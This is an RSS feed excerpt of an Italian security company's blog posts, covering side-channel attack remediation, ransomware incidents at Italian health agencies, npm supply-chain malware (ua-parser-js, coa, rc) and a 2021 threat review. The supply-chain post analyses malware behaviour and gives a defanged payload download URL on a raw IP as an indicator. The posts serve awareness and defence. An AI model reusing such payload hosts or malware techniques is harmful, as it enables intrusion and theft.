&lt;p&gt;Quindi, ipoteticamente, basterebbe modificare uno strumento di pagamento elettronico in modo che possa misurare la potenza consumata per poter effettivamente clonare una carta di credito (senza ovviamente considerare eventuali PIN di sicurezza).
L’esempio appena fatto, anche se molto semplice, descrive l’essenza di un attacco side channel.&lt;/p&gt;

&lt;p&gt;Ovviamente la situazione reale è ben più complessa di quanto appena descritto, ma è anche vero che, ad oggi, alle misure ottenibili dagli strumenti vengono affiancati modelli e calcoli statistici che permettono, in quasi tutti i casi e con tutti gli schemi di cifratura, di ottenere le chiavi private.&lt;/p&gt;

&lt;h2 id=&#34;remediation&#34;&gt;Remediation&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Per far fronte a questi attacchi la cosa migliore consiste nell’implementare algoritmi di crittografia&lt;/strong&gt; prestando attenzione al codice e &lt;strong&gt;per poter resistere agli attacchi basati sul tempo è necessario creare algoritmi la cui esecuzione sia indipendente dai dati in input&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Questi ultimi vengono chiamati algoritmi a tempo costante e vanno creati usando delle particolari tecniche di coding che spesso richiedono un grande sforzo da parte dei programmatori. La grande difficoltà, inoltre, è mantenere un buon livello di efficienza.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-side-channel/attacchi_side_channel_4.PNG&#34; alt=&#34;attacchi-side-channel-3&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Contro gli attacchi che si basano sul consumo di potenza, come è ovvio pensare, bisogna programmare algoritmi il cui consumo di risorse sia indipendente dai dati in input.
Per fare questo esistono delle &lt;strong&gt;tecniche chiamate masking&lt;/strong&gt;. Ci sono vari modi per mascherare il consumo delle varie operazioni e, spesso, questi stessi portano ad un peggioramento dell’efficienza dell’algoritmo. A scopo esemplificativo, di seguito, viene riportata la più semplice ma efficace tecnica di masking.&lt;/p&gt;

&lt;p&gt;Questa &lt;strong&gt;tecnica si basa sul mischiare i dati in input con del materiale randomico&lt;/strong&gt;: effettuare i calcoli e, prima di produrre il risultato, eliminare i dati randomici. In questo modo la potenza consumata sarà sempre casuale perché lo saranno anche i dati su cui lavora l’algoritmo.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-side-channel/attacchi_side_channel_5.PNG&#34; alt=&#34;attacchi-side-channel-4&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Una domanda che viene spontanea è: &lt;strong&gt;ma è davvero possibile rimuovere i dati randomici alla fine del calcolo?&lt;/strong&gt; La risposta è sì, ma la tecnica utilizzata dipende per singolo caso.
Spesso, in alcuni tipi di hardware è complesso creare dei dati casuali: in quei casi esistono altre tecniche per portare ad un consumo di potenza casuale.&lt;/p&gt;

&lt;p&gt;L’insieme di implementazione a tempo costante e tecniche di masking permettono una buona o, in alcuni casi, perfetta protezione contro gli attacchi side-channel. &lt;strong&gt;Il problema, però, è che queste remediation vanno applicate in fase di sviluppo e di design matematico dell’algoritmo&lt;/strong&gt; e, oltre a richiedere delle competenze molto specifiche da parte dei programmatori, &lt;strong&gt;è necessario applicarle senza andare a sacrificare troppo le performance&lt;/strong&gt;.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Perchè la Cyber Security rappresenta una priorità nel settore Healthcare</title>
         <link>https://blog.cybergon.com/posts/perch%C3%A8-la-cyber-security-rappresenta-una-priorita-nel-settore-healthcare/</link>
         <pubDate>Fri, 28 Jan 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/perch%C3%A8-la-cyber-security-rappresenta-una-priorita-nel-settore-healthcare/</guid>
         <description>

&lt;p&gt;Nel nostro &lt;a href=&#34;https://cybergon.com/blog/posts/almanacco-2021-eventi-passati-trend-e-considerazioni&#34;&gt;Almanacco 2021&lt;/a&gt; abbiamo ripercorso tutti gli step fondamentali dell’anno passato.
Quello che è emerso è che, tra i vari metodi di attacco che possono compromettere il normale funzionamento delle aziende, il phishing rimane ancora uno dei più diffusi e i settori maggiormente colpiti sono quelli dell’Healthcare, le telecomunicazioni, il settore bancario e finanziario e la distribuzione, settori in cui le informazioni sensibili esfiltrate durante l’attacco possono essere rivendute più facilmente.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Proprio il settore sanitario ha catturato il nostro interesse per numero di attacchi subiti e soprattutto per l’impatto che questi hanno avuto e che potenzialmente potrebbero avere in futuro sulle nostre vite&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/healthcare/healthcare-copertina.jpg&#34; alt=&#34;Healthcare&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il settore sanitario, che comprende ospedali, cliniche, case farmaceutiche, istituti di ricerca e organizzazioni accademiche, nell’ultimo decennio ha assistito ad una crisi dovuta alla drastica riduzione del personale sanitario da un lato, e da un lento adattamento alle novità in termini di tecnologia dall’altro. Obsolescenza dei terminali, mancati investimenti sensibili sulla sicurezza e processi non condivisi sono solo alcuni degli aspetti da implementare.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In risposta all’emergenza Covid-19, il sistema sanitario si è dovuto, in poco tempo, adeguare alla transizione digitale&lt;/strong&gt; iniziando ad adottare dispositivi mobili e servizi cloud.&lt;/p&gt;

&lt;p&gt;Le tecnologie sono risultate fondamentali in questo periodo perché hanno permesso un maggior coordinamento dell’ecosistema, la possibilità di ricevere diagnosi a distanza, evitare assembramenti e, di conseguenza, di limitare la circolazione del virus.&lt;/p&gt;

&lt;p&gt;D’altro canto, &lt;strong&gt;questa rapida digitalizzazione ha riscosso un enorme interesse da parte dei cyber criminali&lt;/strong&gt;, sia per la qualità e quantità delle informazioni che navigano in queste piattaforme, sia perché i dispositivi, se non adeguatamente protetti, permettono una maggiore superficie di attacco da parte dei criminali.&lt;/p&gt;

&lt;h2 id=&#34;casi-italiani&#34;&gt;Casi italiani&lt;/h2&gt;

&lt;p&gt;In Italia, secondo l’ultimo report Clusit 2022, &lt;strong&gt;il settore maggiormente colpito è stato quello della PA, seguito dall’Healthcare&lt;/strong&gt;.
Secondo il report, inoltre, &lt;strong&gt;nel semestre gennaio-giugno 2021 gli attacchi ai danni del settore della sanità sono aumentati del 19%&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/healthcare/healthcare-1.png&#34; alt=&#34;Healthcare&#34; /&gt;
&lt;em&gt;Img source: clusit.it&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Di seguito riportiamo alcuni casi recenti che è il caso di citare:&lt;/p&gt;

&lt;h3 id=&#34;regione-lazio&#34;&gt;Regione Lazio&lt;/h3&gt;

&lt;p&gt;A luglio 2021, &lt;strong&gt;i servizi informatici della regione Lazio hanno subito un attacco ransomware&lt;/strong&gt; che, secondo le fonti ufficiali, non è riuscito a trafugare né eliminare dati personali.
Nonostante il caso sia successo qualche mese fa, sono ancora pochi i dettagli dell’attacco del 30 luglio che ha mandato in tilt il sistema informatico e quello dedicato alle vaccinazioni per il Covid-19.
In questo attacco, pare che l’anello debole sia stato un dipendente a cui erano state rubate precedentemente le credenziali di accesso al sistema.
&lt;strong&gt;I danni sono stati però sotto l’occhio di tutti: un mese di interruzione dei servizi colpendo in particolar modo il database delle vaccinazioni e di rilascio dei green pass&lt;/strong&gt;, provocando ritardi soprattutto in un periodo di grande richiesta quale quello estivo.
I dati sono stati recuperati da un backup che era stato cancellato e non criptato e l’infezione è stata rilevata e bloccata in tempi brevi.&lt;/p&gt;

&lt;h3 id=&#34;regione-campania&#34;&gt;Regione Campania&lt;/h3&gt;

&lt;p&gt;In Campania, invece, il 12 gennaio 2022, &lt;strong&gt;la ASL NA3 che serve 56 comuni della provincia di Napoli ha annunciato di aver subito un attacco informatico che ha creato gravi disagi e disservizi&lt;/strong&gt;, tra cui l’impossibilità di prenotare tamponi, vaccini e consultare gli esiti del test. Il caso è estremamente recente e ha coinvolto gli esperti del settore e le forze di polizia, che stanno lavorando per capire se i dati sensibili siano già online. Tuttavia, al momento non ci è dato sapere quale sia stata la natura dell’incidente, né quali e quanti server siano stati compromessi.
L’attacco è stato però rivendicato recentemente sul DLS del gruppo criminale Sabbath, con la condivisione di due elementi importanti: la prova del furto dei dati e i commenti tecnici in cui la cyber gang elenca le mancanze riscontrate nelle security operation dell’azienda sanitaria (quando si dice oltre al danno la beffa).&lt;/p&gt;

&lt;h3 id=&#34;ulss-6-euganea&#34;&gt;ULSS 6 Euganea&lt;/h3&gt;

&lt;p&gt;Altro caso recente riguarda l’azienda sanitaria ULSS 6 Euganea di Padova e il suo epilogo particolarmente interessante per le dinamiche.
Il 3 dicembre 2021 &lt;strong&gt;la ULSS 6 ha subito un attacco hacker che ha portato al blocco della maggior parte dei server&lt;/strong&gt;. Le prenotazioni per i vaccini, le nuove registrazioni dei pazienti, il sistema dei laboratori e i punti di prelievo sono stati sospesi e ripristinati dopo più di 13 giorni, grazie al lavoro di tecnici e informatici all’opera per minimizzare i danni dell’incidente informatico.
Nei primi giorni del 2022, si è venuti a conoscenza che la cyber gang che ha violato la ULSS 6 è Lockbit 2.0, già famosa per attacchi ad altre aziende come Thales, Moncler e Regione Lazio.
Il gruppo criminale aveva annunciato di pubblicare i dati dell’azienda sanitaria il giorno 15 gennaio in caso di mancato pagamento del riscatto richiesto, data che è stata poi posticipata di tre giorni. La promessa non è però stata mantenuta perché, &lt;strong&gt;nel corso della giornata del 15 gennaio, i dati dell’azienda sono stati pubblicati sul Data Leak Site di Lockbit 2.0&lt;/strong&gt;. I circa 9300 file resi pubblici contengono informazioni di ogni genere: dalla gestione dell’ospedale e del personale, ai dati sensibili dei pazienti.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/healthcare/healthcare-2.jpg&#34; alt=&#34;Healthcare&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;il-danno-economico-e-il-valore-dei-dati-sanitari&#34;&gt;Il danno economico e il valore dei dati sanitari&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Se in genere gli attacchi informatici oltre ai danni economici portano anche danni reputazionali, l’impatto sul settore sanitario può causare problemi ben più gravi&lt;/strong&gt;. La perdita di dati o l’impossibilità di accedere tempestivamente alle cartelle cliniche dei pazienti possono avere effetti pericolosi per la salute dei pazienti stessi.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gli avversari informatici si sono addentrati in questo settore senza dubbio attratti dal valore delle informazioni sensibili&lt;/strong&gt; che possono essere esfiltrate ed utilizzate per richiedere un riscatto, &lt;strong&gt;ma anche per la presenza di sistemi e dispositivi spesso datati e non aggiornati&lt;/strong&gt;, aspetto che può rendere l’attacco più facile per via delle vulnerabilità non risolte.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;I dati esfiltrati possono anche essere rivenduti nel dark web uno dei mercati più redditizi e con l’offerta più ampia&lt;/strong&gt;.
In CybergON ci siamo catapultati in questo “mondo oscuro” nel nostro quarto libro &lt;a href=&#34;https://hub.cybergon.com/scarica-la-collana-di-libri-cybergon&#34;&gt;“Tor: the dark world”&lt;/a&gt; e abbiamo potuto constatare come la rivendita delle informazioni sensibili nel dark web inondi di collection diversi forum e servizi specializzati. &lt;strong&gt;I prezzi dei dati possono variare: più le cartelle cliniche sono ricche di informazioni legate alla salute del paziente, più il valore aumenta&lt;/strong&gt;. Si parte da 30 dollari per arrivare fino a qualche migliaio di dollari per persone di rilievo, &lt;strong&gt;con una media di circa 360 dollari per cartella clinica&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Inoltre, se all’inizio della pandemia alcuni gruppi criminali avevano annunciato la loro indifferenza verso le aziende sanitarie, soprattutto per evitare danni ad organizzazioni già impegnate nella lotta contro il Covid-19, è stato poi evidenziato da una ricerca di CrowdStrike che nel 2020 sono state 104 le strutture sanitarie colpite da 18 gruppi di criminali.
È il caso di citare la cyber gang DarkSide che aveva dichiarato: “Il nostro obiettivo è fare soldi, non creare disagi per la società&amp;rdquo;. Questa promessa non è però stata mantenuta, poiché il gruppo la scorsa primavera colpì il Dipartimento della Salute irlandese, durante la campagna di vaccinazione.&lt;/p&gt;

&lt;p&gt;In Italia, solo l’11% delle organizzazioni sanitarie utilizza dispositivi medici con software aggiornati, mentre l’89% usa dispositivi medici con un sistema operativo obsoleto a causa di problemi di compatibilità, costi elevati degli aggiornamenti o per la mancanza di conoscenze tecnologiche interne; questi dati rendono il nostro paese ad alto rischio di attacchi informatici.&lt;/p&gt;

&lt;h2 id=&#34;come-difendersi&#34;&gt;Come difendersi&lt;/h2&gt;

&lt;p&gt;Il virus è stata l’esca più utilizzata dai cyber criminali, soprattutto nella creazione di campagne di phishing. Le persone sono condizionate dalle comunicazioni che hanno riferimenti al Covid-19, per questo, quando si ricevono mail inerenti a questo argomento, prestano meno attenzione. È così che i criminali cercano di compromettere le credenziali degli utenti per muoversi indisturbati all’interno dei sistemi informatici.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Ci sono alcuni aspetti che vanno implementati per cercare di ridurre al minimo il rischio di un attacco&lt;/strong&gt;. Le imprese del settore healthcare hanno assoluta necessità di proteggere le informazioni aziendali sensibili – ad esempio relative a brevetti, sperimentazioni, ricerche scientifiche, dipendenti, pazienti e clienti – ma allo stesso tempo hanno l’obbligo di monitorarle per poterle difendere con la massima efficacia possibile e rispondere anche a norme e regolamenti molto specifici.
Le realtà del settore sono tipicamente soggette a regolamenti, ispezioni e obblighi di data integrity e procedure di business continuity che non giocano solo un ruolo cardine per la reputazione dell’azienda stessa, ma anche per offrire vantaggio competitivo. Sono infatti i clienti a richiedere garanzie affinché le informazioni condivise siano protette al meglio: il ruolo della cybersecurity è proprio quello di rispondere alla necessità di unire sicurezza e privacy dei dati.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Secondo il report 2021 di IBM, l’healthcare detiene il record assoluto di Data Breach per l’undicesimo anno di fila; tuttavia, è raro che si venga a sapere di un attacco, probabilmente per il timore delle aziende di dichiararlo apertamente&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Diventa quindi fondamentale per le aziende sanitarie essere consapevoli dei possibili rischi e pianificare e realizzare una difesa con specialisti che devono avere un’idea ben chiara di quali siano gli aspetti critici da proteggere, creando inoltre una cultura aziendale basata sulla formazione dei dipendenti e creando una forte consapevolezza.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il primo elemento&lt;/strong&gt;, anche difficile da mettere in pratica in un momento così delicato, &lt;strong&gt;riguarda, appunto, la formazione del personale&lt;/strong&gt;. L’anello debole in ogni attacco informatico è sempre più spesso l’essere umano, per questo è fondamentale adottare un percorso di formazione continua. Inoltre, è importante avere policy di sicurezza adeguate che vengano condivise con tutti gli utenti.&lt;/p&gt;

&lt;p&gt;In secondo luogo, &lt;strong&gt;l’implementazione dei software di sicurezza&lt;/strong&gt;. Questi possono rilevare comportamenti anomali in tempi brevi, permettendo all’azienda di isolare i segmenti di rete o i device colpiti e neutralizzare l’azione di attacco, evitando così blocchi di servizio.
È anche importante un piano per l’esecuzione di back-up cruciali che devono essere separati dalla rete IT in uso.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gli attacchi informatici al sistema sanitario non si attenueranno, per questo investire sulla sicurezza informatica&lt;/strong&gt;, nonostante questo possa significare un aumento degli investimenti in termini di denaro e di tempo, &lt;strong&gt;è l’unica soluzione per poter mitigare futuri rischi, salvaguardare la sicurezza e affidabilità delle strutture sanitarie ed evitare perdite economiche e danni umani importanti&lt;/strong&gt;.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Attacchi alla supply chain nel mondo dell’open source</title>
         <link>https://blog.cybergon.com/posts/attacchi-alla-supply-chain-nel-mondo-dell-open-source/</link>
         <pubDate>Thu, 13 Jan 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Domenico Orlando</author>
         
               
             <author>Jeremy Bernard Moeys</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/attacchi-alla-supply-chain-nel-mondo-dell-open-source/</guid>
         <description>

&lt;p&gt;Dopo gli attacchi informatici ai provider &lt;a href=&#34;https://cybergon.com/blog/posts/sunburst-backdoor-nelle-patch-di-solarwind-orion/&#34;&gt;Solar Winds&lt;/a&gt; e &lt;a href=&#34;https://cybergon.com/blog/posts/attacchi-alla-supply-chain-il-caso-kaseya/&#34;&gt;Kaseya&lt;/a&gt;, che causarono la compromissione di migliaia di aziende ed enti nazionali in tutto il mondo, &lt;strong&gt;le organizzazioni di cyber criminali hanno diversificato le proprie strategie di attacco alla supply chain&lt;/strong&gt; del software con l’obiettivo di consolidare sempre più il loro impatto sull’economia del cybercrime.&lt;/p&gt;

&lt;p&gt;L’azienda americana di software &lt;strong&gt;Sonatype ha recentemente costruito una &lt;a href=&#34;https://www.sonatype.com/resources/vulnerability-timeline&#34;&gt;timeline&lt;/a&gt; che racchiude la breve storia di tutti gli attacchi registrati&lt;/strong&gt; ad aziende che operano nel settore del B2B del software. Partiremo da questo strumento per un’analisi dettagliata di alcuni casi.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuovo-attacco-alla-supply-chain/attacco-supplychain1.png&#34; alt=&#34;timeline&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;la-libreria-ua-parser-js-di-npm&#34;&gt;La libreria ua-parser-js di NPM&lt;/h2&gt;

&lt;p&gt;Scorrendo sul sito sopracitato la cronologia degli attacchi, tra cui ritroviamo il ransomware Revil di Kaseya del luglio del 2021, è importante soffermarsi su un &lt;strong&gt;major incident che ha visto coinvolta una sussidiaria di GitHub chiamata NPM&lt;/strong&gt;.
L’azienda americana Node Package Manager (NPM) gestisce librerie opensource Javascript ed ogni settimana, dalla sua piattaforma online, vengono effettuati milioni di download di pacchetti utilizzati da grandi aziende come Facebook, Microsoft, Amazon, Instagram, Google, Slack, Mozilla, Discord, Elastic, Intui, Reddit, etc.&lt;/p&gt;

&lt;p&gt;Venerdì 22 ottobre 2021, per quasi 4 ore consecutive, &lt;strong&gt;ua-parser-js, uno dei pacchetti NPM più scaricato, è stato incorporato con uno script dannoso con l’obiettivo di installare un bitcoin miner e un trojan&lt;/strong&gt; per raccogliere informazioni sensibili e credenziali. Le versioni compromesse dai criminali sono state le seguenti: 0.7.29, 0.8.0, 1.0.0.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Per risolvere il codice malevolo è stato effettuato un revert dal codice&lt;/strong&gt; risalendo alla versione precedente all’attacco.
La libreria ua-parser-js viene utilizzata nelle applicazioni o nei siti web per analizzare lo user agent di un browser ed identificare il browser stesso, il sistema operativo, la CPU e il dispositivo dell’utente.
Quando i pacchetti malevoli vengono installati sulla macchina, uno script malevolo .js viene eseguito da una shell Linux o un file batch di Windows per dare il via alla raccolta silente di dati o per minare cryptovaluta.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuovo-attacco-alla-supply-chain/attacco-supplychain2.png&#34; alt=&#34;ua-parser-js&#34; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Già nel 2017 NPM subì un data leak&lt;/strong&gt; importante con 16.400 credenziali di sviluppatori esposte che permise ai criminali di accedere al 14% del repository, che si stima contenesse 79 mila pacchetti Javascript.&lt;/p&gt;

&lt;p&gt;Per i criminali fu semplice trovare l’accesso alla maggior parte degli account tramite ricerche OSINT, poiché i dati erano già disponibili online in seguito a precedenti violazioni. Vennero identificati migliaia di utenti che utilizzavano come password il proprio username oppure password deboli come 1234 o password01. A seguito del primo attacco, venne effettuato un reset password massivo a causa delle scarse regole di cyber-igiene nell’uso delle credenziali da parte degli utenti.&lt;/p&gt;

&lt;p&gt;I diversi attacchi del 2021, però, si pensa provenissero dalla compromissione di account dei mantainer, ovvero di quelle figure che svolgono un’attività di controllo e direzione nella pubblicazione degli sviluppi nei progetti opensource e a cui la community di utilizzatori può segnalare problematiche o discutere miglioramenti.&lt;/p&gt;

&lt;p&gt;NPM richiederà l&amp;rsquo;autenticazione a due fattori nel primo trimestre del 2022. Secondo GitHub, infatti, nessuno dei manutentori di queste librerie popolari possedeva l’MFA abilitata sui propri account al momento della violazione di dati.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuovo-attacco-alla-supply-chain/attacco-supplychain3.png&#34; alt=&#34;npm-two-factor-authentication&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;analisi-dal-malware&#34;&gt;Analisi dal malware&lt;/h2&gt;

&lt;p&gt;Il 20 ottobre 2021 &lt;strong&gt;sono stati individuati dai ricercatori di Sonatype diversi pacchetti chiamati “okhsa” e “klown” nel registro di NPM cryptominer su macchine Windows, macOS e Linux&lt;/strong&gt;. Tutti i pacchetti sono stati pubblicati dallo stesso autore &amp;ldquo;wozheqirsplu&amp;rdquo; il cui account è stato tempestivamente disattivato da NPM.&lt;/p&gt;

&lt;p&gt;In particolare, le diverse versioni del pacchetto &amp;ldquo;okhsa&amp;rdquo; contengono un codice che sfrutta una vulnerabilità nell&amp;rsquo;applicazione Calcolatrice su macchine Windows.&lt;/p&gt;

&lt;p&gt;Questi script scaricano un EXE o un ELF Linux che eseguono un codice che specifica il cryptominer da utilizzare, il portafoglio Bitcoin verso cui indirizzare la criptovaluta estratta e la quantità di CPU da utilizzare.&lt;/p&gt;

&lt;p&gt;Inoltre, è stato identificato un file Batch contenente una sequenza di comandi come cmd.exe in alcune versioni del malware nel pacchetto &amp;ldquo;klown”.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuovo-attacco-alla-supply-chain/attacco-supplychain4.png&#34; alt=&#34;code&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il cryptominer Xmrig, identificato per la prima volta nel maggio 2017, appartiene ad una delle 3 varianti più diffuse che, in particolare, ha colpito l’8% delle organizzazioni in tutto il mondo.&lt;/p&gt;

&lt;p&gt;Il malware riesce a determinare la posizione del dispositivo e, se non si trova in un Paese tra Russia, Ucraina, Bielorussia o e Kazakistan, scarica il file http[:]//159.148.186[.]228/download/jsextension e lo esegue.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuovo-attacco-alla-supply-chain/attacco-supplychain5.png&#34; alt=&#34;malicious&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;la-libreria-coa-e-rc-di-npm&#34;&gt;La libreria coa e rc di NPM&lt;/h2&gt;

&lt;p&gt;Risalendo lungo la cronologia della supplychain di Sonatype arriviamo a novembre 2021 quando &lt;strong&gt;la libreria chiamata “coa” fu colpita dallo stesso identico attacco di ua-parser-js&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Una versione malevola di &amp;ldquo;coa&amp;rdquo; compromessa conteneva trojan simili a quelli visti nel caso di NPM per il furto di credenziali.  Poche ore dopo, &lt;strong&gt;“rc”, un&amp;rsquo;altra libreria con 14 milioni di download settimanali, subì lo stesso hijacking&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tutti gli attacchi hanno avuto una linea in comune: vi è infatti un collegamento tra i criminali e gli incidenti&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuovo-attacco-alla-supply-chain/attacco-supplychain6.jpg&#34; alt=&#34;malware-coa&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il 16 novembre 2021 i ricercatori Kajetan Grzybowski e Maciej Piechota hanno risolto una vulnerabilità che consentiva la pubblicazione non autorizzata di nuove versioni dal 2020.&lt;/p&gt;

&lt;p&gt;In particolare, il problema riguardava il registro JavaScript NPM che consentiva ad un utente malintenzionato di aggiornare qualsiasi pacchetto utilizzando un account senza autorizzazione. GitHub ha dichiarato che la vulnerabilità non è stata sfruttata nella maniera più assoluta in modo dannoso (almeno da settembre 2020).&lt;/p&gt;

&lt;h2 id=&#34;i-rischi-dell-open-source&#34;&gt;I rischi dell’open source&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Oltre il 90% di qualsiasi applicazione moderna è costituita da codice open source&lt;/strong&gt;, consentendo sia l’ispezione del codice che la sua modifica e miglioramento.
Alcuni rischi per la sicurezza informatica derivano dalla costruzione del software open source e dal metodo di distribuzione che in gran parte non è ancora regolamentato.&lt;/p&gt;

&lt;p&gt;I &lt;strong&gt;rischi principali&lt;/strong&gt; sono:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Le vulnerabilità nel software open source sono rese di dominio pubblico dai contributori stessi&lt;/strong&gt;, nonché da organizzazioni come l’NVD.  Se non si effettuano gli aggiornamenti alle ultime versioni o componenti in breve tempo, ci si espone ad un rischio elevato, poiché le vulnerabilità sono spesso identificate e immediatamente sfruttate dai criminali informatici.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Gli sviluppatori responsabili della creazione del software spesso non sono esperti di sicurezza&lt;/strong&gt; e il rischio che si corre è che potrebbero non essere seguite ed implementate le best practice.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Spesso &lt;strong&gt;il software open source richiede l&amp;rsquo;uso di librerie di terze parti&lt;/strong&gt; estratte dai gestori di pacchetti, come NMP. La natura black-box di queste librerie rende più difficile e dispendioso, in termini di tempo, identificare e correggere eventuali vulnerabilità che potrebbero essere introdotte nel codice originale dai criminali informatici. Inoltre, la difficoltà nel trovare una vulnerabilità aumenta ancora di più considerando la complessità esponenziale dei sistemi informatici.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Infine, &lt;strong&gt;il software open source non fornisce alcuna garanzia&lt;/strong&gt; in merito alla sua sicurezza o al suo contenuto.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I membri della comunità possono fornire supporto per problemi di sicurezza attraverso forum aperti senza però essere responsabili in caso di eventuali problemi nel codice. Inoltre, il software open source è generalmente creato da comunità di contributori a volte anonimi, per questo è difficile verificare che il codice fornito sia originale e non preso da una fonte di terze parti.&lt;/p&gt;

&lt;h2 id=&#34;conclusione&#34;&gt;Conclusione&lt;/h2&gt;

&lt;p&gt;Un caso che mette in luce quanto sia potenzialmente pericoloso dedicare un’infrastruttura all’open source è quello del 10 gennaio del 2022: uno sviluppatore ha intenzionalmente corrotto due librerie open source su GitHub e i registri npm &amp;ldquo;faker.js&amp;rdquo; e &amp;ldquo;colors.js&amp;rdquo;, scaricati rispettivamente da 2,5 milioni e 2,4 milioni di utenti. Le versioni sabotate hanno fatto sì che le applicazioni emettessero all&amp;rsquo;infinito lettere e simboli.&lt;/p&gt;

&lt;p&gt;NPM e, soprattutto, il recente caso di Log4j hanno portato &lt;strong&gt;un’attenzione sempre maggiore sulla software composition analysis che deve essere effettuata in anticip&lt;/strong&gt;o per comprendere quali componenti open source vengono utilizzate nei software per poter effettuare una remediation nel caso di injection malevola.&lt;/p&gt;

&lt;p&gt;Più in generale, è arrivato il momento che &lt;strong&gt;i gestori di librerie e gli sviluppatori acquisiscano e concretizzino nuove abitudini in ambito di security&lt;/strong&gt;.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Almanacco 2021: eventi passati, trend e considerazioni</title>
         <link>https://blog.cybergon.com/posts/almanacco-2021-eventi-passati-trend-e-considerazioni/</link>
         <pubDate>Thu, 30 Dec 2021 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Filadelfio Emanuele</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/almanacco-2021-eventi-passati-trend-e-considerazioni/</guid>
         <description>

&lt;p&gt;Se abbiamo definito il 2020 come l’anno 0 della cyber security, quello in cui tutti hanno scoperto il lato oscuro del digitale e ne hanno compreso i rischi, possiamo affermare che &lt;strong&gt;con il 2021 si conclude l’anno 1 della sicurezza informatica&lt;/strong&gt;, quello in cui &lt;strong&gt;la consapevolezza ha dovuto lasciare il posto all’azione&lt;/strong&gt;. Il Rapporto Clusit 2021 evidenzia come i costi degli attacchi cyber abbiano ormai superato il valore del 6% del PIL mondiale. Ecco, quindi, che si fanno avanti investimenti, piani di difesa e risposta alle minacce, tecnologie.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/almanacco2021/almanacco2021-copertina.png&#34; alt=&#34;Almanacco_2021&#34; /&gt;&lt;/p&gt;

&lt;p&gt;L’anno è iniziato con &lt;strong&gt;una delle operazioni più significative della storia della lotta al cyber crime: la chiusura di Emotet&lt;/strong&gt;. Un’operazione particolare anche per la grandiosa collaborazione tra forze dell’ordine di tutto il mondo, che, forti di questa sinergia, hanno messo fine a una delle botnet più pericolose e note.
Certo, l’operazione è stato tanto famosa quanto inutile. A Novembre Emotet è tornato con una nuova campagna, chiamata Operazione Reacharound, che sfrutta altre infrastrutture per la propria distribuzione.&lt;/p&gt;

&lt;p&gt;Tra marzo e aprile si sono susseguiti una serie di attività pericolose che hanno innalzato di molto l’attenzione della stampa e delle aziende. La più eclatante è stata ProxyLogon: &lt;strong&gt;la vulnerabilità 0-day di Microsoft Exchange&lt;/strong&gt; che ha messo in ginocchio oltre 250 mila aziende nel corso di due mesi.&lt;/p&gt;

&lt;p&gt;Il filone degli &lt;strong&gt;attacchi alla supply chain&lt;/strong&gt; iniziato nel 2020 con SolarWinds Orion ha preso definitivamente piede nel 2021 con Kaseya e altri player di mercato. Questo e altri metodi di attacco – il phishing rimane tra i più diffusi – hanno contribuito a compromettere ogni genere di azienda, con un focus globale sul settore manifatturiero e ingegneristico, healthcare, servizi e tecnologia.
